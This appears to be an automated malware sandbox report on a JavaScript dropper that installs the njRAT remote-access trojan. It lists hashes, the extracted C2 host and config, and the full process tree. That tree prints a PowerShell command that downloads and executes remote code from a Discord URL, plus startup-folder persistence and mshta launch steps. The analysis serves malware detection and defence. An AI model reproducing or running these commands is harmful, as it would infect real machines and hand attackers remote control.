Overview

overview

10

Static

static

payload.js

windows7_x64

10

payload.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    10-12-2021 20:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    payload.js

  • Size

    254B

  • MD5

    d6c1fa2786171c21d3f12b40db9973db

  • SHA1

    f61d2307582855a0c214a21f7bfe78a8cfdcbc24

  • SHA256

    2d5964d5c8e6b8cfc4e143160f8d1d29475218f9b86324864411d3c991bee8d5

  • SHA512

    7cf20a00d0b63e7c3e9164bebca0d834376db1d8fd383647c14b6e5eefa229b5d6528ef41290c8656e78bc69f641b7060e9023f0401459562677922715325386

Score
10/10
njratnyan catsuricatatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

dominio12.duckdns.org:4433

Mutex

9015ff612ab2

Attributes
  • reg_key

    9015ff612ab2

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\payload.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/910897865386250264/915258994195582976/link..txt'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4092
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3884
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:612
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2900

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    8c0b4c510dc448a647e0e6a2e6acc7f9

    SHA1

    7c336d0ade87295139c9b388daed7929c7217c40

    SHA256

    07d4fca35e650115c32bcf2d23788ebe08d84bd2657b893ca0a666697b01c006

    SHA512

    84d4edbbdaba998e14094ef3de228c44b6a3fc4fc82073ab281f0ae1b451052daa0ed82b7932b838bcd9bff1986b4dc4812a074a0a8b8f3cd888ac4f1741ebec

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit

  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit

  • C:\Users\Public\myScript.ps1
    MD5

    6e57313d26fb045220fafc5926e4ebb5

    SHA1

    a2ef44cf1f90521b1fae9af0ae8ac75337071618

    SHA256

    390ab39b8c2149c593f857d51207fa6a02e3c642c40fb851583500d5bd675927

    SHA512

    32f213b73bb6cff16973941f11e67384502c79683933a22b708d5a9b45342d0bd01383bf590913c2ca5083852c5ba8c247bfe26a3ac5d113744b34939f681802

    Download Submit

  • memory/612-175-0x000001460AB10000-0x000001460AB12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-177-0x000001460AB13000-0x000001460AB15000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-168-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-162-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-193-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-167-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-170-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-190-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-189-0x00000146257A0000-0x00000146257A3000-memory.dmp

    Filesize

    12KB

    Download

  • memory/612-188-0x0000014625410000-0x0000014625415000-memory.dmp

    Filesize

    20KB

    Download

  • memory/612-164-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-183-0x0000014625400000-0x0000014625402000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-178-0x000001460AB16000-0x000001460AB18000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-169-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-172-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-163-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-194-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-158-0x0000000000000000-mapping.dmp

    Download

  • memory/612-160-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/612-161-0x000001460AA10000-0x000001460AA12000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1632-151-0x0000000000000000-mapping.dmp

    Download

  • memory/2760-157-0x000001DA4D648000-0x000001DA4D650000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2760-156-0x0000000000000000-mapping.dmp

    Download

  • memory/2900-191-0x0000000000400000-0x000000000040C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2900-192-0x000000000040676E-mapping.dmp

    Download

  • memory/2900-200-0x0000000005650000-0x0000000005B4E000-memory.dmp

    Filesize

    5.0MB

    Download

  • memory/3884-155-0x0000000000000000-mapping.dmp

    Download

  • memory/4092-123-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-116-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-121-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-117-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-115-0x0000000000000000-mapping.dmp

    Download

  • memory/4092-119-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-120-0x0000026B738F0000-0x0000026B738F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4092-153-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-134-0x0000026B74370000-0x0000026B74372000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-133-0x0000026B737E6000-0x0000026B737E8000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-131-0x0000026B737E0000-0x0000026B737E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-132-0x0000026B737E3000-0x0000026B737E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-125-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-124-0x0000026B743E0000-0x0000026B743E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4092-118-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4092-122-0x0000026B734D0000-0x0000026B734D2000-memory.dmp

    Filesize

    8KB

    Download